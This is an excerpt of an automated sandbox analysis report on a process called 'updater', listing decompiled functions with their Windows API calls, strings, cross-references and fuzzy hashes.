VarR4FromStr, xrefs: 017B9D90
VarAdd, xrefs: 017B9C9E
VarBstrFromCy, xrefs: 017B9DFE
VariantChangeTypeEx, xrefs: 017B9C5C
VarCmp, xrefs: 017B9D64
VarNot, xrefs: 017B9C88
VarNeg, xrefs: 017B9C72
oleaut32.dll, xrefs: 017B9C49
VarAnd, xrefs: 017B9D22
VarIdiv, xrefs: 017B9CF6
VarSub, xrefs: 017B9CB4
VarBstrFromDate, xrefs: 017B9E14
VarR8FromStr, xrefs: 017B9DA6
VarCyFromStr, xrefs: 017B9DD2
VarI4FromStr, xrefs: 017B9D7A
VarXor, xrefs: 017B9D4E
VarOr, xrefs: 017B9D38
VarDateFromStr, xrefs: 017B9DBC
VarDiv, xrefs: 017B9CE0
VarMod, xrefs: 017B9D0C
VarMul, xrefs: 017B9CCA
VarBstrFromBool, xrefs: 017B9E2A
VarBoolFromStr, xrefs: 017B9DE8

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: e4890b3e2f398d07332dbc716a68cad46ea44cbd0dd62a47e671f845c7226237
Instruction ID: d9359c5f795e4f5925d0fcb10541219e12b2db7acd5aabbbc12e5610eccef445
Opcode Fuzzy Hash: e4890b3e2f398d07332dbc716a68cad46ea44cbd0dd62a47e671f845c7226237
Instruction Fuzzy Hash: F44127F260C3455E52516FBD74C4BA6F7D9E768628770C02AB338CA74DEF30A8404AB9

Function 00C3AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00C3AF51
SetTextColor.GDI32(?,?), ref: 00C3AF55
GetSysColorBrush.USER32(0000000F), ref: 00C3AF6B
GetSysColor.USER32(0000000F), ref: 00C3AF76
CreateSolidBrush.GDI32(?), ref: 00C3AF7B
GetSysColor.USER32(00000011), ref: 00C3AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C3AFA1
SelectObject.GDI32(?,00000000), ref: 00C3AFB2
SetBkColor.GDI32(?,00000000), ref: 00C3AFBB
SelectObject.GDI32(?,?), ref: 00C3AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 00C3AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C3AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 00C3B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C3B05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C3B086
InflateRect.USER32(?,000000FD,000000FD), ref: 00C3B0A4
DrawFocusRect.USER32(?,?), ref: 00C3B0AF
GetSysColor.USER32(00000011), ref: 00C3B0BD
SetTextColor.GDI32(?,00000000), ref: 00C3B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C3B0D9
SelectObject.GDI32(?,00C3AC1F), ref: 00C3B0F0
DeleteObject.GDI32(?), ref: 00C3B0FB
SelectObject.GDI32(?,?), ref: 00C3B101
DeleteObject.GDI32(?), ref: 00C3B106
SetTextColor.GDI32(?,?), ref: 00C3B10C
SetBkColor.GDI32(?,?), ref: 00C3B116

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 0804e3a11b7de878ebea5870bac39a52665b6398e72cf71d66dba76ee7d3e926
Instruction ID: 0d793f3c4fefaea40342cb5d345ca50a745744d630005aea60373cef534afbc2
Opcode Fuzzy Hash: 0804e3a11b7de878ebea5870bac39a52665b6398e72cf71d66dba76ee7d3e926
Instruction Fuzzy Hash: 25616CB5950218AFDF119FA4DC48BAEBB79FF09320F214115FA25AB2A1D7719E40CF90

Function 00C38FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C390EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C390FB
CharNextW.USER32(0000014E), ref: 00C3912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C3916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C39181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C39192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C391AF
SetWindowTextW.USER32(?,0000014E), ref: 00C391FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C39211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C39242
_memset.LIBCMT ref: 00C39267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C392B0
_memset.LIBCMT ref: 00C3930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C39339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00C39391
SendMessageW.USER32(?,0000133D,?,?), ref: 00C3943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00C39460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C394AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C394D7
DrawMenuBar.USER32(?), ref: 00C394E6
SetWindowTextW.USER32(?,0000014E), ref: 00C3950E

Strings

0, xrefs: 00C39478

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 9ea80fbf92c9dbbfa215675725957af1be3f76b3b48603a5a03595ac844384b4
Instruction ID: b085b14261d71aa3e5177007ba7d7364e9ad2691d814c13975af79297f7d0c22
Opcode Fuzzy Hash: 9ea80fbf92c9dbbfa215675725957af1be3f76b3b48603a5a03595ac844384b4
Instruction Fuzzy Hash: A2E1AF75910209AFDF219F55CC84FEE7BB8FF09710F108156FA29AA291D7B08A81DF61

Function 00C34ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C35007
GetDesktopWindow.USER32 ref: 00C3501C
GetWindowRect.USER32(00000000), ref: 00C35023
GetWindowLongW.USER32(?,000000F0), ref: 00C35085
DestroyWindow.USER32(?), ref: 00C350B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C350DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C350F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C3511E
SendMessageW.USER32(?,00000421,?,?), ref: 00C35133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C35146
IsWindowVisible.USER32(?), ref: 00C35166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C35181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C35195
GetWindowRect.USER32(?,?), ref: 00C351AD
MonitorFromPoint.USER32(?,?,00000002), ref: 00C351D3
GetMonitorInfoW.USER32(00000000,?), ref: 00C351ED
CopyRect.USER32(?,?), ref: 00C35204
SendMessageW.USER32(?,00000412,00000000), ref: 00C3526F

Strings

(, xrefs: 00C351E0
0, xrefs: 00C34FB2
tooltips_class32, xrefs: 00C350D3

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 25500adba63ce6bec8cbeabd4e9398050076834a4af9265afb38a506d8894d17
Instruction ID: 552394053bcd26d72d62990b7894baf2440269b7c7ef01c61b1c20ac8af0f86d
Opcode Fuzzy Hash: 25500adba63ce6bec8cbeabd4e9398050076834a4af9265afb38a506d8894d17
Instruction Fuzzy Hash: 60B16A71614740AFD714DF64C885BAFBBE4BF89310F008A1CF9AA9B291D771E905CB92

Function 00C1498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C1499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C149C2
_wcscpy.LIBCMT ref: 00C149F0
_wcscmp.LIBCMT ref: 00C149FB
_wcscat.LIBCMT ref: 00C14A11
_wcsstr.LIBCMT ref: 00C14A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C14A38
_wcscat.LIBCMT ref: 00C14A81
_wcscat.LIBCMT ref: 00C14A88
_wcsncpy.LIBCMT ref: 00C14AB3

Strings

DefaultLangCodepage, xrefs: 00C14A9B
04090000, xrefs: 00C14A6E
\VarFileInfo\Translation, xrefs: 00C14A30
%u.%u.%u.%u, xrefs: 00C14B16
StringFileInfo\, xrefs: 00C14A0B

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 2110c81a7be54f255eb2e86eea593dfb20cc40cf4f4de8f72848a33326843f73
Instruction ID: e72749ae43978f224668662ca9c4dcdecfdb61fe293d5a29a7ef605eac7d5a66
Opcode Fuzzy Hash: 2110c81a7be54f255eb2e86eea593dfb20cc40cf4f4de8f72848a33326843f73
Instruction Fuzzy Hash: B24128726442047BE714B7748C43FBFBBECEF52710F1004AAF904A6292FB359A41A6A5

Function 00BD0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00BC1821: _memmove.LIBCMT ref: 00BC185B

GetForegroundWindow.USER32(00C40980,?,?,?,?,?), ref: 00BD04E3
IsWindow.USER32(?), ref: 00C066BB

Strings

TITLE, xrefs: 00C06650
CLASS, xrefs: 00C064E5
INSTANCE, xrefs: 00C065FA
LAST, xrefs: 00C06472
REGEXPTITLE, xrefs: 00C064B4
ALL, xrefs: 00C06622
ACTIVE, xrefs: 00C06488
HANDLE, xrefs: 00C0649E
REGEXPCLASS, xrefs: 00C06506

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 53ecd0c7f80c7b34dca471a52e252b8d1ae59b6ce35edbdd8abd5424124b0bf9
Instruction ID: 7af8f8bad098dbc6dcf7753825b6aa5e3366cf9880b0cd395fd808b373028aa6
Opcode Fuzzy Hash: 53ecd0c7f80c7b34dca471a52e252b8d1ae59b6ce35edbdd8abd5424124b0bf9
Instruction Fuzzy Hash: 7ED1A670104602DFCB04EF64C481A9AFBF5FF55344F104A6EF866572A2DB31EA69CB92

Function 00C3441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C344AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C3456C

Strings

FINDITEM, xrefs: 00C346DF
GETSELECTEDCOUNT, xrefs: 00C3454F
SELECTCLEAR, xrefs: 00C345EB
GETSUBITEMCOUNT, xrefs: 00C344F7
SELECT, xrefs: 00C34606
GETITEMCOUNT, xrefs: 00C344DE
GETTEXT, xrefs: 00C34515
DESELECT, xrefs: 00C3465A
ISSELECTED, xrefs: 00C34577
GETSELECTED, xrefs: 00C3469A
SELECTINVERT, xrefs: 00C3463C
VIEWCHANGE, xrefs: 00C3472B
SELECTALL, xrefs: 00C345D3

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: e54888491f724dab36dd8aac69439ed56cf67f3ecd53dc033590a8116508bf14
Instruction ID: f60c683e40fdeca48db82d917cc9b405e4ec74c55b601188a87a2711d0c45e33
Opcode Fuzzy Hash: e54888491f724dab36dd8aac69439ed56cf67f3ecd53dc033590a8116508bf14
Instruction Fuzzy Hash: 5AA15E702246419BCB18EF24C891B7AB3E5FF85314F1049A9B8A65B3E2DB70FD05CB52

Function 00C256C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00C256E1
LoadCursorW.USER32(00000000,00007F8A), ref: 00C256EC
LoadCursorW.USER32(00000000,00007F00), ref: 00C256F7
LoadCursorW.USER32(00000000,00007F03), ref: 00C25702
LoadCursorW.USER32(00000000,00007F8B), ref: 00C2570D
LoadCursorW.USER32(00000000,00007F01), ref: 00C25718
LoadCursorW.USER32(00000000,00007F81), ref: 00C25723
LoadCursorW.USER32(00000000,00007F88), ref: 00C2572E
LoadCursorW.USER32(00000000,00007F80), ref: 00C25739
LoadCursorW.USER32(00000000,00007F86), ref: 00C25744
LoadCursorW.USER32(00000000,00007F83), ref: 00C2574F
LoadCursorW.USER32(00000000,00007F85), ref: 00C2575A
LoadCursorW.USER32(00000000,00007F82), ref: 00C25765
LoadCursorW.USER32(00000000,00007F84), ref: 00C25770
LoadCursorW.USER32(00000000,00007F04), ref: 00C2577B
LoadCursorW.USER32(00000000,00007F02), ref: 00C25786
GetCursorInfo.USER32(?), ref: 00C25796
GetLastError.KERNEL32(00000001,00000000), ref: 00C257C1

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 8b1b473247be82e09692119f4acee6ffeea6410c2f6033d65d968d31ba3642cd
Instruction ID: f5974f0ebd038f8739d972b028c7d808da5976e35bc1895c42f19683496d9dea
Opcode Fuzzy Hash: 8b1b473247be82e09692119f4acee6ffeea6410c2f6033d65d968d31ba3642cd
Instruction Fuzzy Hash: 0C418470E44319AADB109FBA9C49D6FFFF8EF41B10B10452FE519E7291DAB8A500CE51

Function 00C0B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C0B17B
__swprintf.LIBCMT ref: 00C0B21C
_wcscmp.LIBCMT ref: 00C0B22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C0B284
_wcscmp.LIBCMT ref: 00C0B2C0
GetClassNameW.USER32(?,?,00000400), ref: 00C0B2F7
GetDlgCtrlID.USER32(?), ref: 00C0B349
GetWindowRect.USER32(?,?), ref: 00C0B37F
GetParent.USER32(?), ref: 00C0B39D
ScreenToClient.USER32(00000000), ref: 00C0B3A4
GetClassNameW.USER32(?,?,00000100), ref: 00C0B41E
_wcscmp.LIBCMT ref: 00C0B432
GetWindowTextW.USER32(?,?,00000400), ref: 00C0B458
_wcscmp.LIBCMT ref: 00C0B46C

Part of subcall function 00BD385C: _iswctype.LIBCMT ref: 00BD3864

Strings

%s%u, xrefs: 00C0B216

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: e27cd912ccd5e1616416aa50dc9ffb6b4625e7d21bf04cfdc858c9d70278f24b
Instruction ID: 604a1d9a05bdf00bd483241579f037dd59a4fefef024c4e4341798fa760d3be4
Opcode Fuzzy Hash: e27cd912ccd5e1616416aa50dc9ffb6b4625e7d21bf04cfdc858c9d70278f24b
Instruction Fuzzy Hash: 2BA1AE71204606ABD714DF64C884FAEB7E8FF44354F108529F9A9D21A1EB30EE55CB91

Function 00C0BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00C0BAB1
_wcscmp.LIBCMT ref: 00C0BAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 00C0BAEA
CharUpperBuffW.USER32(?,00000000), ref: 00C0BB07
_wcscmp.LIBCMT ref: 00C0BB25
_wcsstr.LIBCMT ref: 00C0BB36
GetClassNameW.USER32(00000018,?,00000400), ref: 00C0BB6E
_wcscmp.LIBCMT ref: 00C0BB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 00C0BBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 00C0BBEE
_wcscmp.LIBCMT ref: 00C0BBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 00C0BC26
GetWindowRect.USER32(00000004,?), ref: 00C0BC8F

Strings

ThumbnailClass, xrefs: 00C0BB79, 00C0BBF9
@, xrefs: 00C0BA92

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 7887aa4cf60258fb0f0b7886011a62c076782a70b163a026aab3dc8c6a5628e8
Instruction ID: 082db1f5107a4b236c9c4e29a3bcc8dcfa50cec0ab45e00049d56a0692f3b5b5
Opcode Fuzzy Hash: 7887aa4cf60258fb0f0b7886011a62c076782a70b163a026aab3dc8c6a5628e8
Instruction Fuzzy Hash: 6281B071008306ABEB10DF14C885FAAB7E8FF44714F1484AAFD999A0D6EB34DE45CB61

Function 00C0B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C0B915

Strings

HANDLE=, xrefs: 00C0B90E
[HANDLE:, xrefs: 00C0B921
[REGEXPTITLE:, xrefs: 00C0B93D
REGEXP=, xrefs: 00C0B92A
[ALL, xrefs: 00C0B9BB
[CLASS:, xrefs: 00C0B965
[LAST, xrefs: 00C0B9C2
[ACTIVE, xrefs: 00C0B902
LAST, xrefs: 00C0B8DA
CLASSNAME=, xrefs: 00C0B952
ALL, xrefs: 00C0B9A9
ACTIVE, xrefs: 00C0B8F0

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: d17c06e93f411f39a478aef8f625ce93a8381b3837f499ea8a70ea8ff2cfcedc
Instruction ID: d875e68279d71053ae8ed4b56518a181c578dc74a0ff85182156687ebcddb2dd
Opcode Fuzzy Hash: d17c06e93f411f39a478aef8f625ce93a8381b3837f499ea8a70ea8ff2cfcedc
Instruction Fuzzy Hash: 0D319271A44205A6DB24FBA4CD83FAE73F4AF21750F600569F651B10D3EF96AF04CA52

Function 00C0CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00C0CBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C0CBBC
SetWindowTextW.USER32(?,?), ref: 00C0CBD3
GetDlgItem.USER32(?,000003EA), ref: 00C0CBE8
SetWindowTextW.USER32(00000000,?), ref: 00C0CBEE
GetDlgItem.USER32(?,000003E9), ref: 00C0CBFE
SetWindowTextW.USER32(00000000,?), ref: 00C0CC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C0CC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C0CC3F
GetWindowRect.USER32(?,?), ref: 00C0CC48
SetWindowTextW.USER32(?,?), ref: 00C0CCB3
GetDesktopWindow.USER32 ref: 00C0CCB9
GetWindowRect.USER32(00000000), ref: 00C0CCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C0CD0C
GetClientRect.USER32(?,?), ref: 00C0CD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C0CD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C0CD69

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 340f6fed8f2caa23fc73d7889e516ac5b25416c68a78deacb1e2f97eb203fe09
Instruction ID: 8e28240e0567390de68429577ea3ab9c78b3791eb60859f96ee4c5102a3a018f
Opcode Fuzzy Hash: 340f6fed8f2caa23fc73d7889e516ac5b25416c68a78deacb1e2f97eb203fe09
Instruction Fuzzy Hash: EB516D71900709AFEB209FA8CE89BAEBBF5FF04705F100618F656A25A0D774A954CF50

Function 00C3A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C3A87E
DestroyWindow.USER32(?,?), ref: 00C3A8F8

Part of subcall function 00BC1821: _memmove.LIBCMT ref: 00BC185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C3A972
